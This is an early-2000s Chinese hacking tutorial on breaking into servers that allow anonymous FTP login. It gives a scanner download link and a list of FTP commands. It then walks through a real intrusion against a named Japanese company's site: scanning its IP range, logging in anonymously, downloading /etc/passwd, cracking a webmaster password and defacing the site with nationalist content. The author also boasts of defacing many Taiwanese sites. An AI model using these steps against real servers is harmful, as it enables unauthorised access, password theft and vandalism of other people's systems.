关于允许匿名登陆的主机的简单入侵

/ns/hk/hacker/data/20020811043137.htm

今天我们来看看允许匿名登陆的主机的简单入侵方法。

所需工具:

FTP scanner v2.1.48
下载地址: http://202.103.69.85/city/ftpscaner.zip 1.99M.


***为了你的安全,下载后,请先杀毒!***

=======================

我们这里说的允许匿名登陆的主机是说的匿名FTP登陆.

呵呵

大家也有可能连FTP是什么也不知道.

:)

我们先来看看有关它们的名词解释:

FTP (File Transfer Protocol) 文件传送协议


FTP是在Internet网络上最早用于传输文件的一种通信协议,它是将本地计算机通过登录注册成为远程主机的客户端,通常我们将采用该协议传输文件的程序称为FTP软件。


使用FTP可以从Internet网络上获取远程主机的各类文件信息,包括公用程序、各类应用程序、情报信息等等。FTP支持ASCII与Binary两种传输模式,并且可以在两种模式之间切换。


FTP在实际文件传输中不需要对文件的内容进行修改或解释,也就是说进行的是明码的传输,这样就注定了其安全性的不可靠性。FTP运行在OSI模型的应用层,并利用传输控制协议TCP在不同的主机之间提供可靠的数据传输。FTP在文件传输中支持断点再续,这样大幅度的减少了CPU和网络带宽的开销。利用FTP做攻击也是网络攻击中最为普通的形式.


我们来看看他的相关命令.你也可以在Ms-dos下输入 ftp -help 得到


******************************************

FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,

其中 -v 显示远程服务器的所有响应信息; -n 限制ftp的自动登录,即不使用;.n etrc文件; -d 使用调试方式; -g 取消全局文件名。


FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip

2.$ macro-ame[args]: 执行宏定义macro-name。

3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。

5.ascii:使用ascii类型传输方式。

6.bell:每个命令执行完毕后计算机响铃一次。

7.bin:使用二进制文件传输方式。

8.bye:退出ftp会话过程。

9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。

10.cd remote-dir:进入远程主机目录。

11.cdup:进入远程主机目录的父目录。

12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。

13.close:中断与远程服务器的ftp会话(与open对应)。

14.cr:使用asscii方式传输文件时,将回车换行转换为回行。

15.delete remote-file:删除远程主机文件。

16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。

17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件

18.disconnection:同close。

19.form format:将文件传输方式设置为format,缺省为file方式。

20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。

22.hash:每传输1024字节,显示一个hash符号(#)。

23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。

24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。

25.image:设置二进制传输方式(同binary)。

26.lcd[dir]:将本地工作目录切换至dir。

27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。

28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。

29.mdelete[remote-file]:删除远程主机文件。

30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。

31.mget remote-files:传输多个远程文件。

32.mkdir dir-name:在远程主机中建一目录。

33.mls remote-file local-file:同nlist,但可指定多个文件名。

34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。

35.modtime file-name:显示远程主机文件的最后修改时间。

36.mput local-file:将多个文件传输至远程主机。

37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。

38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。

40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。

41.open host[port]:建立指定ftp服务器连接,可指定连接端口。

42.passive:进入被动传输方式。

43.prompt:设置多个文件传输时的交互提示。

44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。

45.put local-file[remote-file]:将本地文件local-file传送至远程主机。

46.pwd:显示远程主机的当前工作目录。

47.quit:同bye,退出ftp会话。

48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

49.recv remote-file[local-file]:同get。

50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

51.rhelp[cmd-name]:请求获得远程主机的帮助。

52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。

53.rename[from][to]:更改远程主机文件名。

54.reset:清除回答队列。

55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。

56.rmdir dir-name:删除远程主机目录。

57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。

58.send local-file[remote-file]:同put。

59.sendport:设置PORT命令的使用。

60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name:显示远程主机文件大小,如:site idle 7200。

62.status:显示当前ftp状态。

63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。

64.sunique:将远程主机文件名存储设置为只一(与runique对应)。

65.system:显示远程主机的操作系统类型。

66.tenex:将文件传输类型设置为TENEX机的所需的类型。

67.tick:设置传输时的字节计数器。

68.trace:设置包跟踪。

69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。

70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3

71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。

72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.

73.?[cmd]:同help.


FTPD FTP服务器监视程序、FTP守护进程


FTPD是标准的FTP服务器监视程序(Daemon)。它用来应答由inetd接受的连接请求并把这些请求通知文件传输器。Unix系统上FTPD是个标准的组成部分.


FTP server FTP服务器


FTP服务器是Internet上的重要组成部分,它可以使用户通过FTP协议来做用户自己喜欢做的事情。FTP服务器目前有很多的版本和型号以及品牌。但这些版本的安全也是相当受到重视的。他们都因某种错误配置或缺陷而存在有安全漏洞,最为严重的就算是wu-ftpd93年4月以前的那个版。


Anonymous FTP 匿名FTP


在网络中最常用的文件传输协议。允许用户使用Anonymous或FTP作为用户名以用户信箱做为口令(确切的说是任何带@的口令)登陆到系统。虽说匿名FTP本身 并不是个漏洞,因为匿名区域里放置有/etc/passwd和/etc/group文件,往往可能因为管理员配置上的大意造成潜在的安全隐患。


使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。


远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了支持匿名FTP和用户FTP,FTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。这个环节会让一些愚蠢的管理员不知所为而未曾理会,很容易被有心者所利用而得到一个匿名FTP用户所不能得到的权限。


一般解决这个问题可以通过修改inetd的配置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。


一般情况下,FTP只限于在匿名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。(注意:很多FTP服务器在其建立匿名FTP系统中只单纯的依赖自己购买FTP服务器的销售说明书中所讲述的来做,而往往这些销售说明中一般都不会谈到漏洞和堵塞漏洞的方法,这个大意是绝对致命的)。


如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有内部客户将这个文件放置在匿名的FTP区域了。


在很多网络攻击事例中用匿名用户可以阅读到/etc/passwd文件这就是管理员很大错误表现。还有隐患是telnet到ftp21如果允许执行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户,那么随便就可把权限设置成777或者更多的进行修改等等。



先下载FTP scanner 这个软件,我们需要用到它。

杀毒,安装好后,我们从开始菜单中的程序中找到FTP Scanner并运行它。

我们熟悉一下我们要使用的软件的界面。

:)

打开软件我们可以看到

Host 主机


Beginning 开始IP

下面有几个文本框

我们在这里填入我们要开始扫描的IP.


Ending 结束IP

下面有几个文本框

我们在这里填入我们结束扫描的IP.


在下面有一个

Threads 线程

我们可以根据网速来选择这里的线程数.

通常Moden上网选为50--70左右.

更快的话选到100个线程.


然后我们选择菜单Session 里的Begin FTP scan

就可以开始了扫描了..

:)


======================================

应用技巧:

我们可以在View 里的options选项里选择我们的扫描参数.


在Login config里

里的UserName 和 Password我们通常不用更改.

但你也可以改动他.

比如你想扫描特定的帐号.比如扫描用户 Oracle密码也是Oracle的话

就改动这里的 UserName 和 Password


在IP Logging里

我们可以更改扫描结果存放的位置.

随便选择一个位置和文件名就可以了.

默认是存放在安装目录下面的iplog.txt文件.

======================================


台湾的机器我们干掉的太多了,伤及了很多平民网站.

在这里我对我以前的行为作出检讨.

这次,我们来日本看看。:)

相信大家不会不恨小日本吧.


去搜狐网站敲了一个“日本”,搜索一下,

找到1000多个相关网站。

然后,随便挑了一个:

www.jcbus.co.jp

ping www.jcbus.co.jp

得到它的IP。

210.143.99.80

我们来扫描

210.143.99.1-------210.143.99.254

因为我们不是对特定的主机来攻击.现在我们做的只是在一堆机器里面找.

呵呵:)


过了几分钟

结果出来了,找到了10台.

我们来到安装这个扫描器的目录下查看iplog.txt

可以看到.

210.143.99.21

210.143.99.68

210.143.99.80==*

210.143.99.94

210.143.99.121

210.143.99.130

210.143.99.189

210.143.99.175

210.143.99.200

210.143.99.249


运气不错

看到了吗?

www.jcbus.co.jp是可以匿名进去的.

我们就进这个看看吧.:)


C:\>ftp 210.143.99.80

Connected to ns.jcbus.co.jp. 220 ns.jcbus.co.jp FTP server (Version wu-2.4.2-academ[BETA-15](1) Tue Jan 19 00 :22:43 GMT 1999) ready.

User (ns.jcbus.co.jp:(none)):


呵呵 Wu-ftp 2.4.2?

好象有很大的漏洞哦.:)

不过不在我们今天的教程介绍范围.


我们用FTP进去看看.


User (210.143.99.200:(none)): ftp

331 Guest login ok, send your complete e-mail address as password.


Password: ftp@   ----(可以随便输入)

230-The response 'ftp' is not valid 230-Next time please use your e-mail address as your password

230- for example: joe@202.104.49.193

230Guest login ok, access restrictions apply.

ftp>


呵呵

先看看能不能去根目录.

ftp> cd /

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 ASCII data connection for /bin/ls (202.104.49.193,2643) (0 bytes).

bin

cdrom

dev

devices

etc

....

....

....


ASCII Transfer complete.

ftp: 161 bytes received in 0.81Seconds 0.20Kbytes/sec. ftp>

呵呵

执行成功:)

今天运气不错.可能那个MM在想着我了.-----真恶心,:)

但在它的网页的目录里我没有写权限.:(

只好先把密码档先当下来.

ftp> get /etc/passwd

把密码档搞下来.


然后用小榕的流光提取用户.

26个用户.

挂上一个小字典跑.

几分钟过去后,

终于找到一个可以利用的shell了.

user: webmaster

passwd: web


呵呵

这个家伙真笨.


上载了一个脚本,后果嘛,就不用我多说了.

放上一段国歌,插上国旗,找了两个网友欣赏了一下.

1个小时后,网页恢复了.

我回去看了看ftp和webmaster都不能登陆了.



早知道给他留几个后门.:(


这是一次关于允许匿名登陆的主机的简单入侵


是Redhat 4.2


其实我们可以发现.

NT系统的允许匿名登陆的主机更多

很多主机更离谱的是.anonymous竟然有到根目录和写的权限.

能够找到的更多. 不知道他们是怎么搞的.

通常可以找到的是Web是IIS4.0 IIS3.0的NT.

国内的这样的机器真的不少.

不过我发现日本的redhat倒真的不少.有几个网段我扫描过的竟然清一色全部是redhat.